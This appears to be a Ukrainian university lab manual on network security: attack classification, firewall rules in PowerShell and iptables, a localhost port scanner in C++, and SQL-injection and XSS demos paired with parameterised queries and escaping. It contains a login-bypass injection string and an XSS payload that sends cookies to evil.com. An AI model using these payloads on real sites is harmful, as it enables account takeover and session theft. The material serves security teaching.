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КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК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 МЕТОЮ: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Отримання доступу (Access attacks)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Підбір паролів (Brute force)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Експлуатація вразливостей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└── Man-in-the-Middle (MITM)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Відмова в обслуговуванні (DoS/DDoS)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SYN Flood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UDP Flood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└── Amplification attacks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 Розвідка (Reconnaissance)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├── Сканування портів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├── Сканування вразливостей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└── DNS enumeration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 РІВНЕМ OSI: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L2: ARP spoofing, MAC flooding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L3: IP spoofing, ICMP attacks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L4: TCP/UDP attacks, port scanning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 L7: SQL injection, XSS, CSRF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ЛОГІКА ПРАВИЛ БРАНДМАУЕРА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Правила перевіряються ПОСЛІДОВНО (зверху вниз)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Перше правило, що підходить, визначає долю пакета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 набору правил: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ALLOW TCP dst-port=443 (HTTPS)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ALLOW TCP dst-port=80  (HTTP)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ALLOW UDP dst-port=53  (DNS)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4. ALLOW ICMP type=8      (ping request)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5. DENY ALL               (все інше заборонено)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Принцип: "Deny by default" — заборонено все, крім явно дозволеного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-- Вразливий код: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SELECT * FROM users WHERE login='$input' AND pass='$pass'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 Атака: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login: admin'--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pass: anything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 Результат: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SELECT * FROM users WHERE login='admin'--' AND pass='anything'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 Коментар '--' ігнорує перевірку пароля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&lt;!-- Вразливий код: --&gt;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&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;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&lt;!-- Атака: --&gt;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?name=&lt;script&gt;document.location='http://evil.com/s.php?c='+document.cookie&lt;/script&gt;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&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;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активних TCP-з'єднань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| Where-Object State -eq 'Established'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LocalPort, RemoteAddress, RemotePort, OwningProcess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Sort-Object RemoteAddress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Перегляд активних UDP-з'єднань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Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess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Визначення процесу за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Get-Process -Id 1234 | Select-Object Name, Path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Активні з'єднання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ss -tunapl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Або через netstat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netstat -tunapl | grep ESTABLISHED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Захоплення HTTP-трафіку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tcpdump -i eth0 port 80 -A | head -50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поточних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Get-NetFirewallRule | Where-Object Enabled -eq True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DisplayName, Direction, Action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Створення правила: блокувати вхідні на порт 23 (Telnet)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New-NetFirewallRule -DisplayName "Block Telnet"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-Direction Inbound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-LocalPort 23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-Protocol TCP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-Action Block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Створення правила: дозволити вхідні на порт 443 (HTTPS)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New-NetFirewallRule -DisplayName "Allow HTTPS"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-Direction Inbound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-LocalPort 443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-Protocol TCP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-Action Allow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Видалення правила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Remove-NetFirewallRule -DisplayName "Block Telnet"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статусу брандмауера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Get-NetFirewallProfile | Select-Object Name, Enabled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поточних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-L -n -v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Дозволити вхідні на порт 80 (HTTP)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80 -j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Дозволити вхідні на порт 443 (HTTPS)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443 -j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Заблокувати вхідні з конкретної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-s 10.0.0.100 -j DROP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Заборонити все інше (в кінці)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-j DROP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Зберегти правила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iptables-save &gt; /etc/iptables.rules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Windows: перевірка прослуховуваних портів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-State Listen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LocalPort, OwningProcess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Sort-Object LocalPort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Визначення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-State Listen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ForEach-Object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$proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue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[PSCustomObject]@{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Port = $_.LocalPort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Process = $proc.Name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Path = $proc.Path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| Sort-Object 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Linux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ss -tuln | grep LISTEN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Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,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у властивостях додати бібліотеку ws2_32.lib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(Linker → Input → Additional Dependencies).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&lt;winsock2.h&gt;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&lt;ws2tcpip.h&gt;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#pragma comment(lib, "ws2_32.lib")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using socket_t = SOCKET;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const socket_t INVALID_SOCK = INVALID_SOCKET;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&lt;sys/socket.h&gt;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&lt;arpa/inet.h&gt;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&lt;unistd.h&gt;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using socket_t = int;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const socket_t INVALID_SOCK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#define closesocket close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struct ServiceName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port;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char* name;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ServiceName KNOWN_SERVICES[]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{21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},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{53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},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{443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},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{5432, "PostgreSQL"}, {8080, "HTTP-alt"}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char* serviceName(int port)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ServiceName&amp; service : KNOWN_SERVICES)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(service.port == port) return service.name;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"Unknown";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Спроба встановити з'єднання: успіх означає, що порт відкритий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isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500)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socket_t sock = socket(AF_INET, SOCK_STREAM, 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(sock == INVALID_SOCK)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Обмежуємо час очікування, інакше сканування триватиме надто довго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DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);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setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,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reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));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timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000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setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &amp;timeout, sizeof(timeout));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sockaddr_in address{};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address.sin_family = AF_INET;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address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));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inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);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opened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connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address))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closesocket(sock);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opened;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УВАГА: сканувати дозволено лише власний комп'ютер або вузол,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на який є письмовий дозвіл власника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target = "127.0.0.1";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std::vector&lt;int&gt; ports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21, 22, 23, 25, 53, 80, 110, 135, 139, 143,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443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080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WSADATA wsa;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(WSAStartup(MAKEWORD(2, 2), &amp;wsa)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std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";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"Сканування " &lt;&lt; target &lt;&lt; "...\n\n";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"Відкриті порти:\n";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found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port : ports)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(isPortOpen(target, port))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  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port)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++found;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(found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(жодного з перевірених портів не відкрито)\n";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WSACleanup();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Демонстрація SQL-ін'єкції та захисту від неї.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Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h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до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.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"sqlite3.h"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Створює навчальну базу в пам'яті з двома обліковими записами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sqlite3* setupDatabase()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sqlite3* db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sqlite3_open(":memory:", &amp;db);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const char* schema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"CREATE TABLE users ("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id INTEGER PRIMARY KEY,"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login TEXT NOT NULL,"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password TEXT NOT NULL,"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role TEXT DEFAULT 'user');"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"INSERT INTO users (login, password, role)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"VALUES ('admin', 'secret123', 'admin');"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"INSERT INTO users (login, password, role)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"VALUES ('user1', 'pass1', 'user');";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sqlite3_exec(db, schema, nullptr, nullptr, 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db;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ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані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потрапляють у текст запиту й змінюють його структуру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vulnerableLogin(sqlite3* db, const std::string&amp; login,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query = "SELECT login, role FROM users WHERE login='" + login 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"' AND password='" + password + "'";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"[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query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sqlite3_stmt* stmt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(sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK)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"[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db)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found = (sqlite3_step(stmt) == SQLITE_ROW);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(found)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"[ВРАЗЛИВИЙ] Вхід виконано як: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0) &lt;&lt; " (роль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1)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sqlite3_finalize(stmt);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БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються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окремо через параметри й ніколи не тлумачаться як код SQL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safeLogin(sqlite3* db, const std::string&amp; login,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char* query = "SELECT login, role FROM users WHERE login=? AND password=?";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"[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query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"[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";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sqlite3_stmt* stmt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sqlite3_prepare_v2(db, query, -1, &amp;stmt, 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sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);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sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);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found = (sqlite3_step(stmt) == SQLITE_ROW);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(found)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"[БЕЗПЕЧНИЙ] Вхід виконано як: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0)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sqlite3_finalize(stmt);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sqlite3* db = setupDatabase();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Коректний вхід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vulnerableLogin(db, "admin", "secret123");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Атака SQL-ін'єкцією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Введене значення закриває лапку й додає умову, істинну завжди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injection = "' OR '1'='1";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bypassed = vulnerableLogin(db, "admin", injection);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(bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено")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Та сама атака на параметризованому запиті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blocked = safeLogin(db, "admin", injection);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(blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено")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sqlite3_close(db);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SQL-ІН'ЄКЦІЇ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 Звичайний вхід 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Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'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(1, 'admin', 'secret123', 'admin')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 SQL-ін'єкція: admin'-- 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Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'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(1, 'admin', 'secret123', 'admin')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АТАКА УСПІШНА! Увійшли без пароля.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--- Той самий ввід через безпечний метод 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[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?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[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')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None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Ін'єкція заблокована!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XSS ТА ЗАХИСТУ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Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;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Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;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НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.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 екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;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Безпечно! Скрипт відображається як текст.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Встановити Wireshark (якщо не встановлено)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Запустити захоплення трафіку на основному інтерфейсі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Відвідати кілька веб-сайтів (HTTP і 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Знайти та проаналізувати HTTP-запити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Застосувати фільтри для виділення трафіку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Переглянути поточні правила брандмауера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Створити правило для блокування порту з варіанта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Створити правило для дозволу порту з варіанта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Перевірити роботу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Видалити тестові правила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Визначити відкриті порти на localhost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Ідентифікувати процеси, що прослуховують порти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Записати результати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 Запустити демонстраційний код SQL-ін'єкції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успішну атаку на вразливий код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Продемонструвати блокування атаки безпечним кодом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Повторити для XSS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